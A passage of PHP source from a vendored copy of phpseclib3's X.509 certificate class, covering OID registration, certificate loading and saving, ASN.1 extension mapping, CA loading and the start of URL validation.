signatures signed by certificate authorities * * Not really used anymore but retained all the same to suppress E_NOTICEs from old installs * */ const VALIDATE_SIGNATURE_BY_CA = 1; /** * Return internal array representation * * @see \phpseclib3\File\X509::getDN() */ const DN_ARRAY = 0; /** * Return string * * @see \phpseclib3\File\X509::getDN() */ const DN_STRING = 1; /** * Return ASN.1 name string * * @see \phpseclib3\File\X509::getDN() */ const DN_ASN1 = 2; /** * Return OpenSSL compatible array * * @see \phpseclib3\File\X509::getDN() */ const DN_OPENSSL = 3; /** * Return canonical ASN.1 RDNs string * * @see \phpseclib3\File\X509::getDN() */ const DN_CANON = 4; /** * Return name hash for file indexing * * @see \phpseclib3\File\X509::getDN() */ const DN_HASH = 5; /** * Save as PEM * * ie. a base64-encoded PEM with a header and a footer * * @see \phpseclib3\File\X509::saveX509() * @see \phpseclib3\File\X509::saveCSR() * @see \phpseclib3\File\X509::saveCRL() */ const FORMAT_PEM = 0; /** * Save as DER * * @see \phpseclib3\File\X509::saveX509() * @see \phpseclib3\File\X509::saveCSR() * @see \phpseclib3\File\X509::saveCRL() */ const FORMAT_DER = 1; /** * Save as a SPKAC * * @see \phpseclib3\File\X509::saveX509() * @see \phpseclib3\File\X509::saveCSR() * @see \phpseclib3\File\X509::saveCRL() * * Only works on CSRs. Not currently supported. */ const FORMAT_SPKAC = 2; /** * Auto-detect the format * * Used only by the load*() functions * * @see \phpseclib3\File\X509::saveX509() * @see \phpseclib3\File\X509::saveCSR() * @see \phpseclib3\File\X509::saveCRL() */ const FORMAT_AUTO_DETECT = 3; /** * Attribute value disposition. * If disposition is >= 0, this is the index of the target value. */ const ATTR_ALL = -1; // All attribute values (array). const ATTR_APPEND = -2; // Add a value. const ATTR_REPLACE = -3; // Clear first, then add a value. /** * Distinguished Name * * @var array */ private $dn; /** * Public key * * @var string|PublicKey */ private $publicKey; /** * Private key * * @var string|PrivateKey */ private $privateKey; /** * The certificate authorities * * @var array */ private $CAs = []; /** * The currently loaded certificate * * @var array */ private $currentCert; /** * The signature subject * * There's no guarantee \phpseclib3\File\X509 is going to re-encode an X.509 cert in the same way it was originally * encoded so we take save the portion of the original cert that the signature would have made for. * * @var string */ private $signatureSubject; /** * Certificate Start Date * * @var string */ private $startDate; /** * Certificate End Date * * @var string|Element */ private $endDate; /** * Serial Number * * @var string */ private $serialNumber; /** * Key Identifier * * See {@link http://tools.ietf.org/html/rfc5280#section-4.2.1.1 RFC5280#section-4.2.1.1} and * {@link http://tools.ietf.org/html/rfc5280#section-4.2.1.2 RFC5280#section-4.2.1.2}. * * @var string */ private $currentKeyIdentifier; /** * CA Flag * * @var bool */ private $caFlag = \false; /** * SPKAC Challenge * * @var string */ private $challenge; /** * @var array */ private $extensionValues = []; /** * OIDs loaded * * @var bool */ private static $oidsLoaded = \false; /** * Recursion Limit * * @var int */ private static $recur_limit = 5; /** * URL fetch flag * * @var bool */ private static $disable_url_fetch = \false; /** * @var array */ private static $extensions = []; /** * @var ?array */ private $ipAddresses = null; /** * @var ?array */ private $domains = null; /** * Default Constructor. * * @return X509 */ public function __construct() { // Explicitly Tagged Module, 1988 Syntax // http://tools.ietf.org/html/rfc5280#appendix-A.1 if (!self::$oidsLoaded) { // OIDs from RFC5280 and those RFCs mentioned in RFC5280#section-4.1.1.2 \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::loadOIDs([ //'id-pkix' => '1.3.6.1.5.5.7', //'id-pe' => '1.3.6.1.5.5.7.1', //'id-qt' => '1.3.6.1.5.5.7.2', //'id-kp' => '1.3.6.1.5.5.7.3', //'id-ad' => '1.3.6.1.5.5.7.48', 'id-qt-cps' => '1.3.6.1.5.5.7.2.1', 'id-qt-unotice' => '1.3.6.1.5.5.7.2.2', 'id-ad-ocsp' => '1.3.6.1.5.5.7.48.1', 'id-ad-caIssuers' => '1.3.6.1.5.5.7.48.2', 'id-ad-timeStamping' => '1.3.6.1.5.5.7.48.3', 'id-ad-caRepository' => '1.3.6.1.5.5.7.48.5', //'id-at' => '2.5.4', 'id-at-name' => '2.5.4.41', 'id-at-surname' => '2.5.4.4', 'id-at-givenName' => '2.5.4.42', 'id-at-initials' => '2.5.4.43', 'id-at-generationQualifier' => '2.5.4.44', 'id-at-commonName' => '2.5.4.3', 'id-at-localityName' => '2.5.4.7', 'id-at-stateOrProvinceName' => '2.5.4.8', 'id-at-organizationName' => '2.5.4.10', 'id-at-organizationalUnitName' => '2.5.4.11', 'id-at-title' => '2.5.4.12', 'id-at-description' => '2.5.4.13', 'id-at-dnQualifier' => '2.5.4.46', 'id-at-countryName' => '2.5.4.6', 'id-at-serialNumber' => '2.5.4.5', 'id-at-pseudonym' => '2.5.4.65', 'id-at-postalCode' => '2.5.4.17', 'id-at-streetAddress' => '2.5.4.9', 'id-at-uniqueIdentifier' => '2.5.4.45', 'id-at-role' => '2.5.4.72', 'id-at-postalAddress' => '2.5.4.16', 'jurisdictionOfIncorporationCountryName' => '1.3.6.1.4.1.311.60.2.1.3', 'jurisdictionOfIncorporationStateOrProvinceName' => '1.3.6.1.4.1.311.60.2.1.2', 'jurisdictionLocalityName' => '1.3.6.1.4.1.311.60.2.1.1', 'id-at-businessCategory' => '2.5.4.15', //'id-domainComponent' => '0.9.2342.19200300.100.1.25', //'pkcs-9' => '1.2.840.113549.1.9', 'pkcs-9-at-emailAddress' => '1.2.840.113549.1.9.1', //'id-ce' => '2.5.29', 'id-ce-authorityKeyIdentifier' => '2.5.29.35', 'id-ce-subjectKeyIdentifier' => '2.5.29.14', 'id-ce-keyUsage' => '2.5.29.15', 'id-ce-privateKeyUsagePeriod' => '2.5.29.16', 'id-ce-certificatePolicies' => '2.5.29.32', //'anyPolicy' => '2.5.29.32.0', 'id-ce-policyMappings' => '2.5.29.33', 'id-ce-subjectAltName' => '2.5.29.17', 'id-ce-issuerAltName' => '2.5.29.18', 'id-ce-subjectDirectoryAttributes' => '2.5.29.9', 'id-ce-basicConstraints' => '2.5.29.19', 'id-ce-nameConstraints' => '2.5.29.30', 'id-ce-policyConstraints' => '2.5.29.36', 'id-ce-cRLDistributionPoints' => '2.5.29.31', 'id-ce-extKeyUsage' => '2.5.29.37', //'anyExtendedKeyUsage' => '2.5.29.37.0', 'id-kp-serverAuth' => '1.3.6.1.5.5.7.3.1', 'id-kp-clientAuth' => '1.3.6.1.5.5.7.3.2', 'id-kp-codeSigning' => '1.3.6.1.5.5.7.3.3', 'id-kp-emailProtection' => '1.3.6.1.5.5.7.3.4', 'id-kp-timeStamping' => '1.3.6.1.5.5.7.3.8', 'id-kp-OCSPSigning' => '1.3.6.1.5.5.7.3.9', 'id-ce-inhibitAnyPolicy' => '2.5.29.54', 'id-ce-freshestCRL' => '2.5.29.46', 'id-pe-authorityInfoAccess' => '1.3.6.1.5.5.7.1.1', 'id-pe-subjectInfoAccess' => '1.3.6.1.5.5.7.1.11', 'id-ce-cRLNumber' => '2.5.29.20', 'id-ce-issuingDistributionPoint' => '2.5.29.28', 'id-ce-deltaCRLIndicator' => '2.5.29.27', 'id-ce-cRLReasons' => '2.5.29.21', 'id-ce-certificateIssuer' => '2.5.29.29', 'id-ce-holdInstructionCode' => '2.5.29.23', //'holdInstruction' => '1.2.840.10040.2', 'id-holdinstruction-none' => '1.2.840.10040.2.1', 'id-holdinstruction-callissuer' => '1.2.840.10040.2.2', 'id-holdinstruction-reject' => '1.2.840.10040.2.3', 'id-ce-invalidityDate' => '2.5.29.24', 'rsaEncryption' => '1.2.840.113549.1.1.1', 'md2WithRSAEncryption' => '1.2.840.113549.1.1.2', 'md5WithRSAEncryption' => '1.2.840.113549.1.1.4', 'sha1WithRSAEncryption' => '1.2.840.113549.1.1.5', 'sha224WithRSAEncryption' => '1.2.840.113549.1.1.14', 'sha256WithRSAEncryption' => '1.2.840.113549.1.1.11', 'sha384WithRSAEncryption' => '1.2.840.113549.1.1.12', 'sha512WithRSAEncryption' => '1.2.840.113549.1.1.13', 'id-ecPublicKey' => '1.2.840.10045.2.1', 'ecdsa-with-SHA1' => '1.2.840.10045.4.1', // from https://tools.ietf.org/html/rfc5758#section-3.2 'ecdsa-with-SHA224' => '1.2.840.10045.4.3.1', 'ecdsa-with-SHA256' => '1.2.840.10045.4.3.2', 'ecdsa-with-SHA384' => '1.2.840.10045.4.3.3', 'ecdsa-with-SHA512' => '1.2.840.10045.4.3.4', 'id-dsa' => '1.2.840.10040.4.1', 'id-dsa-with-sha1' => '1.2.840.10040.4.3', // from https://tools.ietf.org/html/rfc5758#section-3.1 'id-dsa-with-sha224' => '2.16.840.1.101.3.4.3.1', 'id-dsa-with-sha256' => '2.16.840.1.101.3.4.3.2', // from https://tools.ietf.org/html/rfc8410: 'id-Ed25519' => '1.3.101.112', 'id-Ed448' => '1.3.101.113', 'id-RSASSA-PSS' => '1.2.840.113549.1.1.10', //'id-sha224' => '2.16.840.1.101.3.4.2.4', //'id-sha256' => '2.16.840.1.101.3.4.2.1', //'id-sha384' => '2.16.840.1.101.3.4.2.2', //'id-sha512' => '2.16.840.1.101.3.4.2.3', //'id-GostR3411-94-with-GostR3410-94' => '1.2.643.2.2.4', //'id-GostR3411-94-with-GostR3410-2001' => '1.2.643.2.2.3', //'id-GostR3410-2001' => '1.2.643.2.2.20', //'id-GostR3410-94' => '1.2.643.2.2.19', // Netscape Object Identifiers from "Netscape Certificate Extensions" 'netscape' => '2.16.840.1.113730', 'netscape-cert-extension' => '2.16.840.1.113730.1', 'netscape-cert-type' => '2.16.840.1.113730.1.1', 'netscape-comment' => '2.16.840.1.113730.1.13', 'netscape-ca-policy-url' => '2.16.840.1.113730.1.8', // the following are X.509 extensions not supported by phpseclib 'id-pe-logotype' => '1.3.6.1.5.5.7.1.12', 'entrustVersInfo' => '1.2.840.113533.7.65.0', 'verisignPrivate' => '2.16.840.1.113733.1.6.9', // for Certificate Signing Requests // see http://tools.ietf.org/html/rfc2985 'pkcs-9-at-unstructuredName' => '1.2.840.113549.1.9.2', // PKCS #9 unstructured name 'pkcs-9-at-challengePassword' => '1.2.840.113549.1.9.7', // Challenge password for certificate revocations 'pkcs-9-at-extensionRequest' => '1.2.840.113549.1.9.14', ]); } } /** * Load X.509 certificate * * Returns an associative array describing the X.509 cert or a false if the cert failed to load * * @param array|string $cert * @param int $mode * @return mixed */ public function loadX509($cert, $mode = self::FORMAT_AUTO_DETECT) { if (\is_array($cert) && isset($cert['tbsCertificate'])) { unset($this->currentCert); unset($this->currentKeyIdentifier); $this->dn = $cert['tbsCertificate']['subject']; if (!isset($this->dn)) { return \false; } $this->currentCert = $cert; $currentKeyIdentifier = $this->getExtension('id-ce-subjectKeyIdentifier'); $this->currentKeyIdentifier = \is_string($currentKeyIdentifier) ? $currentKeyIdentifier : null; unset($this->signatureSubject); return $cert; } if ($mode != self::FORMAT_DER) { $newcert = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::extractBER($cert); if ($mode == self::FORMAT_PEM && $cert == $newcert) { return \false; } $cert = $newcert; } if ($cert === \false) { $this->currentCert = \false; return \false; } $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($cert); if ($decoded) { $x509 = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Certificate::MAP); } if (!isset($x509) || $x509 === \false) { $this->currentCert = \false; return \false; } $this->signatureSubject = \substr($cert, $decoded[0]['content'][0]['start'], $decoded[0]['content'][0]['length']); if ($this->isSubArrayValid($x509, 'tbsCertificate/extensions')) { $this->mapInExtensions($x509, 'tbsCertificate/extensions'); } $this->mapInDNs($x509, 'tbsCertificate/issuer/rdnSequence'); $this->mapInDNs($x509, 'tbsCertificate/subject/rdnSequence'); $key = $x509['tbsCertificate']['subjectPublicKeyInfo']; $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($key, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\SubjectPublicKeyInfo::MAP); $x509['tbsCertificate']['subjectPublicKeyInfo']['subjectPublicKey'] = "-----BEGIN PUBLIC KEY-----\r\n" . \chunk_split(\base64_encode($key), 64) . "-----END PUBLIC KEY-----"; $this->currentCert = $x509; $this->dn = $x509['tbsCertificate']['subject']; $currentKeyIdentifier = $this->getExtension('id-ce-subjectKeyIdentifier'); $this->currentKeyIdentifier = \is_string($currentKeyIdentifier) ? $currentKeyIdentifier : null; return $x509; } /** * Save X.509 certificate * * @param array $cert * @param int $format optional * @return string */ public function saveX509(array $cert, $format = self::FORMAT_PEM) { if (!\is_array($cert) || !isset($cert['tbsCertificate'])) { return \false; } switch (\true) { // "case !$a: case !$b: break; default: whatever();" is the same thing as "if ($a && $b) whatever()" case !($algorithm = $this->subArray($cert, 'tbsCertificate/subjectPublicKeyInfo/algorithm/algorithm')): case \is_object($cert['tbsCertificate']['subjectPublicKeyInfo']['subjectPublicKey']): break; default: $cert['tbsCertificate']['subjectPublicKeyInfo'] = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element(\base64_decode(\preg_replace('#-.+-|[\\r\\n]#', '', $cert['tbsCertificate']['subjectPublicKeyInfo']['subjectPublicKey']))); } $filters = []; $type_utf8_string = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_UTF8_STRING]; $filters['tbsCertificate']['signature']['parameters'] = $type_utf8_string; $filters['tbsCertificate']['signature']['issuer']['rdnSequence']['value'] = $type_utf8_string; $filters['tbsCertificate']['issuer']['rdnSequence']['value'] = $type_utf8_string; $filters['tbsCertificate']['subject']['rdnSequence']['value'] = $type_utf8_string; $filters['tbsCertificate']['subjectPublicKeyInfo']['algorithm']['parameters'] = $type_utf8_string; $filters['signatureAlgorithm']['parameters'] = $type_utf8_string; $filters['authorityCertIssuer']['directoryName']['rdnSequence']['value'] = $type_utf8_string; //$filters['policyQualifiers']['qualifier'] = $type_utf8_string; $filters['distributionPoint']['fullName']['directoryName']['rdnSequence']['value'] = $type_utf8_string; $filters['directoryName']['rdnSequence']['value'] = $type_utf8_string; foreach (self::$extensions as $extension) { $filters['tbsCertificate']['extensions'][] = $extension; } /* in the case of policyQualifiers/qualifier, the type has to be \phpseclib3\File\ASN1::TYPE_IA5_STRING. \phpseclib3\File\ASN1::TYPE_PRINTABLE_STRING will cause OpenSSL's X.509 parser to spit out random characters. */ $filters['policyQualifiers']['qualifier'] = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_IA5_STRING]; \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::setFilters($filters); $this->mapOutExtensions($cert, 'tbsCertificate/extensions'); $this->mapOutDNs($cert, 'tbsCertificate/issuer/rdnSequence'); $this->mapOutDNs($cert, 'tbsCertificate/subject/rdnSequence'); $cert = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($cert, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Certificate::MAP); switch ($format) { case self::FORMAT_DER: return $cert; // case self::FORMAT_PEM: default: return "-----BEGIN CERTIFICATE-----\r\n" . \chunk_split(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($cert), 64) . '-----END CERTIFICATE-----'; } } /** * Map extension values from octet string to extension-specific internal * format. * * @param array $root (by reference) * @param string $path */ private function mapInExtensions(array &$root, $path) { $extensions =& $this->subArrayUnchecked($root, $path); if ($extensions) { for ($i = 0; $i < \count($extensions); $i++) { $id = $extensions[$i]['extnId']; $value =& $extensions[$i]['extnValue']; /* [extnValue] contains the DER encoding of an ASN.1 value corresponding to the extension type identified by extnID */ $map = $this->getMapping($id); if (!\is_bool($map)) { $decoder = $id == 'id-ce-nameConstraints' ? [static::class, 'decodeNameConstraintIP'] : [static::class, 'decodeIP']; $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($value); if (!$decoded) { continue; } $mapped = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], $map, ['iPAddress' => $decoder]); $value = $mapped === \false ? $decoded[0] : $mapped; if ($id == 'id-ce-certificatePolicies') { for ($j = 0; $j < \count($value); $j++) { if (!isset($value[$j]['policyQualifiers'])) { continue; } for ($k = 0; $k < \count($value[$j]['policyQualifiers']); $k++) { $subid = $value[$j]['policyQualifiers'][$k]['policyQualifierId']; $map = $this->getMapping($subid); $subvalue =& $value[$j]['policyQualifiers'][$k]['qualifier']; if ($map !== \false) { $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($subvalue); if (!$decoded) { continue; } $mapped = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], $map); $subvalue = $mapped === \false ? $decoded[0] : $mapped; } } } } } } } } /** * Map extension values from extension-specific internal format to * octet string. * * @param array $root (by reference) * @param string $path */ private function mapOutExtensions(array &$root, $path) { $extensions =& $this->subArray($root, $path, !empty($this->extensionValues)); foreach ($this->extensionValues as $id => $data) { \extract($data); $newext = ['extnId' => $id, 'extnValue' => $value, 'critical' => $critical]; if ($replace) { foreach ($extensions as $key => $value) { if ($value['extnId'] == $id) { $extensions[$key] = $newext; continue 2; } } } $extensions[] = $newext; } if (\is_array($extensions)) { $size = \count($extensions); for ($i = 0; $i < $size; $i++) { if ($extensions[$i] instanceof \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element) { continue; } $id = $extensions[$i]['extnId']; $value =& $extensions[$i]['extnValue']; switch ($id) { case 'id-ce-certificatePolicies': for ($j = 0; $j < \count($value); $j++) { if (!isset($value[$j]['policyQualifiers'])) { continue; } for ($k = 0; $k < \count($value[$j]['policyQualifiers']); $k++) { $subid = $value[$j]['policyQualifiers'][$k]['policyQualifierId']; $map = $this->getMapping($subid); $subvalue =& $value[$j]['policyQualifiers'][$k]['qualifier']; if ($map !== \false) { // by default \phpseclib3\File\ASN1 will try to render qualifier as a \phpseclib3\File\ASN1::TYPE_IA5_STRING since it's // actual type is \phpseclib3\File\ASN1::TYPE_ANY $subvalue = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element(\Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($subvalue, $map)); } } } break; case 'id-ce-authorityKeyIdentifier': // use 00 as the serial number instead of an empty string if (isset($value['authorityCertSerialNumber'])) { if ($value['authorityCertSerialNumber']->toBytes() == '') { $temp = \chr(\Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::CLASS_CONTEXT_SPECIFIC << 6 | 2) . "\x01\x00"; $value['authorityCertSerialNumber'] = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element($temp); } } } /* [extnValue] contains the DER encoding of an ASN.1 value corresponding to the extension type identified by extnID */ $map = $this->getMapping($id); if (\is_bool($map)) { if (!$map) { //user_error($id . ' is not a currently supported extension'); unset($extensions[$i]); } } else { $value = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($value, $map, ['iPAddress' => [static::class, 'encodeIP']]); } } } } /** * Map attribute values from ANY type to attribute-specific internal * format. * * @param array $root (by reference) * @param string $path */ private function mapInAttributes(&$root, $path) { $attributes =& $this->subArray($root, $path); if (\is_array($attributes)) { for ($i = 0; $i < \count($attributes); $i++) { $id = $attributes[$i]['type']; /* $value contains the DER encoding of an ASN.1 value corresponding to the attribute type identified by type */ $map = $this->getMapping($id); if (\is_array($attributes[$i]['value'])) { $values =& $attributes[$i]['value']; for ($j = 0; $j < \count($values); $j++) { $value = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($values[$j], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AttributeValue::MAP); $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($value); if (!\is_bool($map)) { if (!$decoded) { continue; } $mapped = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], $map); if ($mapped !== \false) { $values[$j] = $mapped; } if ($id == 'pkcs-9-at-extensionRequest' && $this->isSubArrayValid($values, $j)) { $this->mapInExtensions($values, $j); } } elseif ($map) { $values[$j] = $value; } } } } } } /** * Map attribute values from attribute-specific internal format to * ANY type. * * @param array $root (by reference) * @param string $path */ private function mapOutAttributes(&$root, $path) { $attributes =& $this->subArray($root, $path); if (\is_array($attributes)) { $size = \count($attributes); for ($i = 0; $i < $size; $i++) { /* [value] contains the DER encoding of an ASN.1 value corresponding to the attribute type identified by type */ $id = $attributes[$i]['type']; $map = $this->getMapping($id); if ($map === \false) { //user_error($id . ' is not a currently supported attribute', E_USER_NOTICE); unset($attributes[$i]); } elseif (\is_array($attributes[$i]['value'])) { $values =& $attributes[$i]['value']; for ($j = 0; $j < \count($values); $j++) { switch ($id) { case 'pkcs-9-at-extensionRequest': $this->mapOutExtensions($values, $j); break; } if (!\is_bool($map)) { $temp = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($values[$j], $map); $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($temp); if (!$decoded) { continue; } $values[$j] = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AttributeValue::MAP); } } } } } } /** * Map DN values from ANY type to DN-specific internal * format. * * @param array $root (by reference) * @param string $path */ private function mapInDNs(array &$root, $path) { $dns =& $this->subArray($root, $path); if (\is_array($dns)) { for ($i = 0; $i < \count($dns); $i++) { for ($j = 0; $j < \count($dns[$i]); $j++) { $type = $dns[$i][$j]['type']; $value =& $dns[$i][$j]['value']; if (\is_object($value) && $value instanceof \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element) { $map = $this->getMapping($type); if (!\is_bool($map)) { $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($value); if (!$decoded) { continue; } $value = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], $map); } } } } } } /** * Map DN values from DN-specific internal format to * ANY type. * * @param array $root (by reference) * @param string $path */ private function mapOutDNs(array &$root, $path) { $dns =& $this->subArray($root, $path); if (\is_array($dns)) { $size = \count($dns); for ($i = 0; $i < $size; $i++) { for ($j = 0; $j < \count($dns[$i]); $j++) { $type = $dns[$i][$j]['type']; $value =& $dns[$i][$j]['value']; if (\is_object($value) && $value instanceof \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element) { continue; } $map = $this->getMapping($type); if (!\is_bool($map)) { $value = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element(\Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($value, $map)); } } } } } /** * Associate an extension ID to an extension mapping * * @param string $extnId * @return mixed */ private function getMapping($extnId) { if (!\is_string($extnId)) { // eg. if it's a \phpseclib3\File\ASN1\Element object return \true; } if (isset(self::$extensions[$extnId])) { return self::$extensions[$extnId]; } switch ($extnId) { case 'id-ce-keyUsage': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\KeyUsage::MAP; case 'id-ce-basicConstraints': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\BasicConstraints::MAP; case 'id-ce-subjectKeyIdentifier': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\KeyIdentifier::MAP; case 'id-ce-cRLDistributionPoints': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CRLDistributionPoints::MAP; case 'id-ce-authorityKeyIdentifier': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AuthorityKeyIdentifier::MAP; case 'id-ce-certificatePolicies': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CertificatePolicies::MAP; case 'id-ce-extKeyUsage': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\ExtKeyUsageSyntax::MAP; case 'id-pe-authorityInfoAccess': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\AuthorityInfoAccessSyntax::MAP; case 'id-ce-subjectAltName': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\SubjectAltName::MAP; case 'id-ce-subjectDirectoryAttributes': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\SubjectDirectoryAttributes::MAP; case 'id-ce-privateKeyUsagePeriod': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PrivateKeyUsagePeriod::MAP; case 'id-ce-issuerAltName': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\IssuerAltName::MAP; case 'id-ce-policyMappings': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PolicyMappings::MAP; case 'id-ce-nameConstraints': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\NameConstraints::MAP; case 'netscape-cert-type': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\netscape_cert_type::MAP; case 'netscape-comment': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\netscape_comment::MAP; case 'netscape-ca-policy-url': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\netscape_ca_policy_url::MAP; // since id-qt-cps isn't a constructed type it will have already been decoded as a string by the time it gets // back around to asn1map() and we don't want it decoded again. //case 'id-qt-cps': // return Maps\CPSuri::MAP; case 'id-qt-unotice': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\UserNotice::MAP; // the following OIDs are unsupported but we don't want them to give notices when calling saveX509(). case 'id-pe-logotype': // http://www.ietf.org/rfc/rfc3709.txt case 'entrustVersInfo': // http://support.microsoft.com/kb/287547 case '1.3.6.1.4.1.311.20.2': // szOID_ENROLL_CERTTYPE_EXTENSION case '1.3.6.1.4.1.311.21.1': // szOID_CERTSRV_CA_VERSION // "SET Secure Electronic Transaction Specification" // http://www.maithean.com/docs/set_bk3.pdf case '2.23.42.7.0': // id-set-hashedRootKey // "Certificate Transparency" // https://tools.ietf.org/html/rfc6962 case '1.3.6.1.4.1.11129.2.4.2': // "Qualified Certificate statements" // https://tools.ietf.org/html/rfc3739#section-3.2.6 case '1.3.6.1.5.5.7.1.3': return \true; // CSR attributes case 'pkcs-9-at-unstructuredName': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PKCS9String::MAP; case 'pkcs-9-at-challengePassword': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DirectoryString::MAP; case 'pkcs-9-at-extensionRequest': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\Extensions::MAP; // CRL extensions. case 'id-ce-cRLNumber': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CRLNumber::MAP; case 'id-ce-deltaCRLIndicator': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CRLNumber::MAP; case 'id-ce-issuingDistributionPoint': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\IssuingDistributionPoint::MAP; case 'id-ce-freshestCRL': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CRLDistributionPoints::MAP; case 'id-ce-cRLReasons': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CRLReason::MAP; case 'id-ce-invalidityDate': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\InvalidityDate::MAP; case 'id-ce-certificateIssuer': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CertificateIssuer::MAP; case 'id-ce-holdInstructionCode': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\HoldInstructionCode::MAP; case 'id-at-postalAddress': return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\PostalAddress::MAP; } return \false; } /** * Load an X.509 certificate as a certificate authority * * @param string $cert * @return bool */ public function loadCA($cert) { $olddn = $this->dn; $oldcert = $this->currentCert; $oldsigsubj = $this->signatureSubject; $oldkeyid = $this->currentKeyIdentifier; $cert = $this->loadX509($cert); if (!$cert) { $this->dn = $olddn; $this->currentCert = $oldcert; $this->signatureSubject = $oldsigsubj; $this->currentKeyIdentifier = $oldkeyid; return \false; } /* From RFC5280 "PKIX Certificate and CRL Profile": If the keyUsage extension is present, then the subject public key MUST NOT be used to verify signatures on certificates or CRLs unless the corresponding keyCertSign or cRLSign bit is set. */ //$keyUsage = $this->getExtension('id-ce-keyUsage'); //if ($keyUsage && !in_array('keyCertSign', $keyUsage)) { // return false; //} /* From RFC5280 "PKIX Certificate and CRL Profile": The cA boolean indicates whether the certified public key may be used to verify certificate signatures. If the cA boolean is not asserted, then the keyCertSign bit in the key usage extension MUST NOT be asserted. If the basic constraints extension is not present in a version 3 certificate, or the extension is present but the cA boolean is not asserted, then the certified public key MUST NOT be used to verify certificate signatures. */ //$basicConstraints = $this->getExtension('id-ce-basicConstraints'); //if (!$basicConstraints || !$basicConstraints['cA']) { // return false; //} $this->CAs[] = $cert; $this->dn = $olddn; $this->currentCert = $oldcert; $this->signatureSubject = $oldsigsubj; return \true; } /** * Validate an X.509 certificate against a URL * * From RFC2818 "HTTP over TLS": * * Matching is performed using the matching rules specified by * [RFC2459]. If more than one identity of a given type is present in * the certificate (e.g., more than one dNSName name, a match in any one * of the set is considered acceptable.) Names may contain the wildcard * character * which is considered to match any single domain name * component or component fragment. E.g., *.a.com matches foo.a.com but * not bar.foo.a.com. f*.com matches foo.com but not bar.com. * * @param string $url * @return bool */ public function validateURL($url) { if (!\is_array($this->currentCert) || !isset($this->currentCert['tbsCertificate'])) { return \false; } $components = \parse_url($url); if (!isset($components['host'])) { return \false; } if ($names = $this->getExtension('id-ce-subjectAltName')) { foreach ($names as $name) { foreach ($name as $key => $value) { $value = \preg_quote($value); $value = \str_replace('\\*', 